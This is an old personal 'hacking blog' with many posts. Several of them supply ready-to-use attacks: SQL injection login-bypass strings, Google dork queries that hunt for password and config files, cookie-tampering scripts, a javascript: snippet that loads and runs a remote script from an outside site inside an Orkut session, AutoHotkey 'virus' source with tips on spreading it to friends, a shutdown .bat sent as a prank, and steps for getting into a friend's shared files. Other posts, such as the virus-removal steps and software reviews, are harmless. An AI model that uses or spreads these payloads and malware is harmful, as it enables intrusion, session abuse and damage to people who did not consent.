hacking blog

2009-05-30T11:21:00.002+05:30

The previous SQL injection tutorial gave some basic information about SQL injection. In this tutorial some commands are given which you can use in SQL injection.

If you missed the previous tutorial

http://ashishsoft.blogspot.com/2008/01/basic-sql-injection-sql-injection.html

the various commands you can use are

admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

hope you will use this information in constructive manner.
and thanks to ComSec aka ZSL

2008-05-15T12:45:00.008+05:30

Type Racer Crack

Hey all Orkut has added many applications. Which you may add into your profiles one of the popular application is Type Racer. Which enables you to race against other people and test your typin skills. But evil minds always work on the other side :D. I have made a crack for the type racer which enables you to win the race every time you type as the crack types automatically everytime!!!
Here is the link to the crack
www.bitsnbytes.org.in/scrap/ashish.exe

and here are the steps to use it.

Download the crack.
Copy the text to type.
Press the button "Crack it" in the crack.
Place cursor in the box within 2 seconds.
Win the race and enjoy!!!!!!

If you like it please give your comments.....

2008-02-17T22:39:00.001+05:30

Stay invisible in gtalk

Google has not provided anything which allows you to be invisible on gtalk. but you can be invisible by using the following procedure... here it is

Follow the below instructions

1. First of all u have to download this software.

2. Goto accounts setup.

3. Click on add.

4.Type any name.

5. Again click add.

6. U have to keep GTalk id in front of Jabber id.

7. password is your GTALK ID password.

8.Click on save.

9. Now click on connections tab.

10. U have to check all the check boxes.

11. In host keep : talk.google.com.

12. Right Click on ur profile name.

13. Right click on profile name.

14. Now u have 2 click on XML consolee.

15.Check out the boxes which r Enable.

16. Keep dis on script field "55"

17. Now click upon trnsnmit

18. Finished now ur invisible.

2008-01-20T22:49:00.000+05:30

Preventing access to your computer

Well you might answer this question by saying that just apply password to user accounts and you are done!!! But this method is not that secure what you think as this method gives the cracker the user names in the system, and obviously if you have guest account enabled then you may have invited a big problem. For completely securing your computer you should apply the password at computer startup. Which mean when you switch on your machine it will ask you for your password. Which indeed is more secure. So here we go

1. Click Start->Run then write syskey.
2. A dialog box will appear click update over there
3. Then select the password start up in the new dialog box which came after selecting update
4. Then type in the password and confirm it and press OK.
5. You are done but don't ever forget your password else you won't be able to start your computer.

2008-01-15T14:16:00.000+05:30

Yahoo Messenger from behind a firewall

How to use Yahoo Messenger from behind a firewall (but with proxied access)

1.Download httptunnel (dont ask me just Google it) , compile and install on a *nix machine you have handy on the net somewhere (this is the tricky bit).

2. Set httptunnel up to forward from an "allowed out" port (eg https 443 or snews 563) to yahoo's servers (scs.yahoo.com port 5050) like so:

hts --forward-port scs.yahoo.com:5050 563

3. Set up your messenger client with the address & port of your server. ie your.machine.com port 563.

4. (optional) Firewall off the port so only you can connect to it

2008-01-12T23:39:00.000+05:30

Basic SQL injection

An SQL injection attack consists of insertion of an SQL query via the input data from the client to the application.A successful SQL injection exploit can read data from the database, modify database data , execute administration operations on the database (such shutdown the DBMS), and in some cases issue commands to the operating system.

SQL Injection attacks are of three types:

Inband: data is extracted using the same channel that is used to inject the SQL code. This is the most straightforward kind of attack, in which the retrieved data is presented directly in the application web page
Out-of-band: data is retrieved using a different channel (e.g.: an email with the results of the query is generated and sent to the tester)
Inferential: there is no actual transfer of data, but the tester is able to reconstruct the information by sending particular requests and observing the resulting behaviour of the DB Server

Example:

For example a web page executes the following query

SELECT * FROM Users WHERE Username='$username' AND Password='$password'

suppose we write the following in the username and password field of the form

$username = 1' or '1' = '1
$password = 1' or '1' = '1

The resultant query will be

SELECT * FROM Users WHERE Username= '1' OR '1' = '1' AND Password= '1' OR '1' = '1'

clearly this will always return true and hence whole database will be shown to the user
(the database table used in this particular query)

But sometimes the DBA is clever he may write query like this one

SELECT * FROM Users WHERE ((Username='$username') AND (Password=MD5('$password')))

In this case, there are two problems, one due to the use of the
parenthesis and one due to the use of MD5 hash function. First of all
we resolve the problem of the parenthesis. That simply consist of
adding a number of closing parenthesis until we obtain a corrected
query. To resolve the second problem we try to invalidate the second
condition.

The resulting query will be
$username = 1' or '1' = '1'))/*
$password = abc

Note:In Oracle use "--" instead of "/*"

the resulting query will be

SELECT * FROM Users WHERE ((Username='1' or '1' = '1'))/*') AND (Password=MD5('$password'))) 

This was basic SQL injection but you will rarely find a website on which these injection
techniques will be working. Watch out for advanced SQL injection techniques in new posts.


आशीष कुमार

2008-01-05T23:06:00.000+05:30

Google Hacking

Google is a really good search engine. It crawls your website very effeciently, so efficiently that it reads each and every page of your site except you block that!!! so there is a good chance that it will also read some files which are confidential like passwords files. But even then there ways to find them but we will concentrate here on finding those files via Google. The basic rule is find some common names which a web administrator could keep of these confidential files. Over past, I have found some good file names which can be searched on Google. Obviously you need to know some of the basic web programming to understand the code in these files( and some time encryption too :) ). But the bottom line is you can access these files very easily. Below are some queries which were working till now( but you can never be sure!!!) although web administrators are really clever they too know about these queries and block them as soon as possible. So some of these queries may not give you good results.

Here they go( search on Google for the following)

1) ext:ini eudora.ini
2)ext:inc “pwd=” “UID=”
3)ext:asa | ext:bak intext:uid intext:pwd -”uid..pwd” database | server | dsn ( This one sucks now!!!!)
4)index.of.etc ( a very good for finding /etc/pwd on linux
5)enable password | secret “current configuration” -intext:the ( give configration file for CISCO very useful in finding the network structure)
6)eggdrop filetype:user user ( useful for IRC usenames and passwords)
7) intitle:index.of config.php ( a really good one for database access)

this was all folks watch out for more.... thanks you are free to comment

* disclaimer: use at your own risk.

2008-01-02T23:12:00.000+05:30

Cookie editing through javascript injection

JS injection is a technique which allows you to alter the content of a site without leaving the site. This can be used to spoof the server which is using javasript.

Requirements
1) A javascript enabled browser ( I will say use Mozilla Firefox)
2) A webpage which uses cookies ( For ex orkut)

Procedure

First check that the site has any cookie do this by

javascript:alert(document.cookie);

after this you will get an alert box showing you the cookie of the site with various fields

to edit the cookie use the following script

javascript:void(document.cookie="fieldname=value");

replace fieldname with the name of the field which you want to alter and value with the altered value

and you have just edited the cookie!!! you can verify it by usin alert(document।cookie) option.

आशीष कुमार

2008-01-01T18:35:00.000+05:30

Send scraps to all your friends without any ad

There are many scripts which claim to send scraps to all your friends. But most of them send scraps with a line written below " TO SEND SCRAPSA TO ALL YOUR FRIENDS CLICK HERE" and your are caught that you havent send any personalised scrap to your friend instead you have used a script for the purpose but the following script do the job neatly without any ad!!!!

To use the scrips follow the followin steps
1. Login to your orkut acccount.
2. Copy the script given below.
3. Paste the script on the address bar of the browser while orkut home page opened
4. Send scrap without any add!!!!!

Here is the script
javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://bitsnbytes.org.in/data/scrap%20all.txt';void(0)

ENJOY!!!!

आशीष कुमार

2007-12-27T22:33:00.000+05:30

How to disable Orkut and Mozilla firefox?

The code for the virus win32.usb is---

ifwinactive ahk_class IFrame
{
ControlGetText,ed,edit1,ahk_class IFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED you fool`??`r`r MUHAHAHA!!,30
return
}

ControlGetText,ed,edit2,ahk_class IFrame
ifinstring,ed,orkut
{
winclose ahk_class IFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED you fool`??`r`r MUHAHAHA!!,30
return
}

ControlGetText,ed,edit2,ahk_class IFrame
ifinstring,ed,orkut
{
winclose ahk_class IFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED you fool`??`r`r MUHAHAHA!!,30
return
}

ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,orkut
{.......}
}

Just copy this code into a notepad and save it with the .usb or else with .exe
use the above methods to send this virus

Your friends orkut will be banned. If you run this on your system then youll also face the same problem
As every problem has a solution, Below is the trick to disable the virus

2007-12-27T22:27:00.000+05:30

Is Mozilla is banned Orkut is banned on your system?

Are you facing these Messages when you open your Mozilla firefox or when you open your Orkut Home page?

"I DNT HATE MOZILLA BUT USE IE OR ELSE..."

"USE INTERNET EXPLORER U DOPE"

"Orkut is banned you fool, The administrators didnt write this program guess who did?? MUHAHAHA!!" with a caption ORKUT IS BANNED

Have you been wondering how these messages pop up when I open my mozilla firefox, if you are looking for the solution to disable Orkut at home or at school then you are at the right place.
Well, before describing this you must know how did u get this? Its simply a w32.USB worm It spreads by inserting a pen drive or anything into the USB in which your w32.USB worm is dumped

Manual steps for removing the Virus

1.Open Task Manager by pressing CTRL+ALT+DEL and select Processes tab

2. Search for "svchost.exe" below the image file name. There will be many files with same name but look for the one which have your "Username" and "Password"

3. Delete these files by pressing delete. It will give display a warning, Press Ok

4. Search for more svchost.exe with your username and delete it. Don't Ever try to kill svchost.exe with names local, network service and local service.

5. Open "My Computer"

6. Type C:\heap41a in the adress bar and press enter. a Hidden folder will be displayed, and is not visible by default. Delete all the files here

7. Hold "windows key + r" and type "Regedit"

9. Go to Edit Menu>> Find>>type "heap41a" and press enter

10."[winlogon] C:\heap41a\svchost.exe C:\heap(some number)\std.txt" will be displayed, delete these files and a window will pop up askin you "Are you sure you want to delete this value?" clik Ok. and close the registry editor window.

Virus will be deleted by following these steps, deltete the autorun.inf file and any .exe file in the pendrive.

2007-12-25T22:29:00.000+05:30

OSX on normal Intel/AMD PC!!!!!!!!

This is a guide to install MAC OSX on your pc(standalone no dual boot). Following this guide you will be able to install OSX on your PC.

Disclaimer:
Installing OSX on your PC is illegal do it on your own risk. I will not be responsible for anything. If you are following this guide its your wish.

Requirements:
1. A prepatched OSX 10.4.8 install image (you need to be an Apple developer to get this and it isn’t allowed to download the file you get by typing the search term “JaS” on the regular places).
2. An empty DVD recordable (+R or –R, NO Rewritable!)
3. At least 6 GB free space on a HD.
4. A SSE2 supporting processor (SSE isnot supported, SSE2 and/or SSE3 is supported)

The Method:
1. Make sure the processor of the machine you’ll be installing supports at least SSE2! If the computer runs Windows, you can check this requirement by installing CPU-Z.
2. Get a prepatched OSX install image.
3. Burn the image to an empty dvd recordable (+R or –R). You can use nero for this.

Caution: After this step you will loose all the data!!!

4. Insert the OSX install disk and reboot your computer.
5. Boot the DVD, when the grey Apple stops spinning, select your Language (
6. On the top of the screen, click ‘Utilities’ and then ‘Disk Utility’.
7. Disk Utility starts. Select your Hard Disk (the whole Hard Disk, not just a partition). Hit the erase tab and set the Volume Format to “Mac OS extended (journaled)”. Hit Erase.
8. Wait until the process finishes and close Disk Utility (by clicking the red dot at the top left corner of the screen).
9. Follow the installation steps on your screen, select the HD with the partition you made in step 6 and don’t forget to choose ‘customize’.
In the Customization window, select either the Intel or OSX. Choose more packages if they apply.
10. After finishing the installation, wait for the computer to reboot, remove the install disk and start playing with your native OSX installation!

If you like please comment

2007-12-23T22:48:00.000+05:30

Shut down remote pc through a file

Want to shut down your friend pc just through a file??? try this

1) Open notepad type shutdown -s
2) Save it as anyname.bat
3) Send it to your friend
4) When your friend opens the file his system will automatically shut down after 30 secs.

Just simple as that. You can customise this option even further for example you can control the time of shut down(the default is 30 secs) you can even display a message!!!!
watch out for more

2007-12-19T22:18:00.000+05:30

Accessing your friends shared files through yahoo messenger

1) Open Command Prompt. Have some one on yahoo messenger send you a file; while the file is sending, in command prompt type -> netstat -an press enter

2)it will show alll Active Connections on your computer, in there under foreign ip for a number thats ends in 5050. this is the persons ip adress who is sending you the file

3)Now type : net use: h \\ (the person's ip adress)\shareddocs push enter wait for message to show up
4)If it is successful you should get a message saying command prompt was successful. If you get a error message than your attempt has failed, probably because the person has disabled sharing of files over a network.

5)if you get the message that says command was successful, than go to my computer. There you will see a file named "shareddocs on (the name of your computer)" open this file

you are now connected to that person's computer

2007-11-21T16:50:00.000+05:30

Run incompatible programs on Vista

Newer operating systems usually show incompatibility with older applications. Same is the case with Windows Vista. Many programs do not run in Windows Vista due to unavailability of drivers or incompatibility with software versions, etc. To fix this, Windows Vista provides program compatibility options which helps run older apps in Windows Vista.

If an application refuses to run in Windows Vista, right click it's .exe file and select 'Properties'. In the properties box, click on 'Compatibility' tab. In the 'Compatibility Mode' drop down menu, select the operating system in which your older application previously worked best. Also check 'Run this program as an administrator'. Click OK and you are done.

2007-08-06T22:26:00.001+05:30

AVG is best??

If you compare AVG with any other antivirus., then AVG scores really well. I dont know why people go for norton or mcaffe or anyother antiviruses when they can get one of the best(well its not the best!!) for free!!!

Yes, the best part of AVG is that its free you dont need to spend a penny on it. While norton and other antivirus softwares are paid one. Some even charge yearly fee!!! and some charge even for updates!!

And after testing various antivirus softwares I can say that you can nearly save 30 mb's of RAM if you prefer AVG over others. The only irritating thing I could find in that is the pop up download window which opens automatically without asking. And without asking it automatically downloads the update and updates the database!!

Apart from this the AVG is the best so i will reccomend every one that use AVG and save money as well as your RAM.

2007-06-24T15:11:00.000+05:30

अब ब्लोग्स हिंदी मैं भी!!!!

अब आप हिंदी मैं भी ब्लोग्स पोस्ट कर सकते है । गूगल भारत हैदराबाद की और से ।

2007-06-24T14:53:00.000+05:30

Organizations should use Open Office

You many have heard of openoffice or might have used that too. But for most of us Microsoft Office is the only software for this purpose!!! Well Open office is a open source software which is developed by Sun Microsystems. And yeah its true that Open office is not as good as MS Office but still its a free software and on the contrary you have to pay for the MS Office package. And moreover open office can work seamlessly on MS office format and its having its own format too. So you have functionalities of both. But for heavy users like who have to manage thousands of records in MS excel spreadsheet for that MS office is better as open office takes lot of time to open heavy files of MS office format. But it works fine with its own format. But nearly 90% of the users will never use such big files so its better to switch to open office and save license fee.

I am too using open office as I am a not a heavy user and I have to only do word editing thing. So I use open office and its working fine. And moreover I don't have to pay for the license fee for open office thats the best part.

So organizations should use open office for them as in most of the offices only word editing has to be dont many features of the package is never used. It will save a lot of money, which can be invested in other softwares or any other thing.

2007-06-23T22:15:00.000+05:30

Safari 3 beta released for windows and Mac

Apple has launched Safari for windows too. Earlier it was available only for Mac OS X. The safari is about 2 times faster than any of their counterparts. Its stable and secure too.Since its released Apple has fixed many holes in Safari beta 3 and its still is in beta version so dont expect that it will run like the older safari of Mac. But yes on the speed side it has improved a lot. We hope that it will be the best browser when it final version is released.

But for now it crashes on some of sites. I tried www.espnstar.com and the safari crashed every time. By the way I have submitted a crash report to Apple so I hope that it will be fixed very soon.
One more feature I felt is lacking is Google toolbar. May be its so because I am so used to google toolbar in firefox.
but anyways Safari indeed is emerging as a very good browser and it is a threat to browsers like firefox and IE 7 mainly due to its speed but if some more features are added like google toolbar then definatley its going to rule the roost

And by the way download safari from here www.apple.com/downloads

2006-05-05T15:26:00.000+05:30

firefox browser

Basically, Firefox 2 will have a better way to handle feeds.

Currently in Firefox 1.5, there are two ways.

* Through live bookmarks
Subscribing a feed in Firefox as a live bookmark can be done two ways, the easy way and the hard way. The easy way is that the site is kind enough to put a in the header to show that it has a feed to subscribe. The hard way is that the site only provides links, and you’ll have to copy the link manually, go to Bookmarks Manager, and add the feed as a live bookmark yourself.
* Through newsreaders
This will need two conditions to make the process streamlined. First, you will have to have a newsreader that registers itself to the feed: pseudo-protocol. Second, the website has to provide a hyperlink that actually uses the feed: protocol, such as the feed links at the footer of WordPress blogs.

I’m quite amazed on how people think alike sometimes…
This happened a few weeks ago:
I took a look at the feed links that WordPress provides at the footer of my WordPress blog (which I never did), and found out that it utilizes the feed: pseudo-protocol.
A few thoughts ran through. First, I was like, “OK, it’s intended for newsreaders that register themselves to the feed: protocol,” then, I was like, “but wait, I don’t use newsreaders, it would be nice for Firefox to handle it automatically.” Then, my third thought came: “hey, why not let the user choose the default action? The user can choose to let Firefox handle it, or the user can decide to let Firefox pass it on to whatever newsreader registered for the feed: protocol.”

Now Firefox 2 will go even further. Now when you encounter a feed, Firefox 2 will offer you three options:

1. Subscribe as live bookmark
2. Pass it on to the default newsreader
3. Send it to an aggregating website, such as Netvibes

Coincidently, I’m a heavy user of Netvibes ;)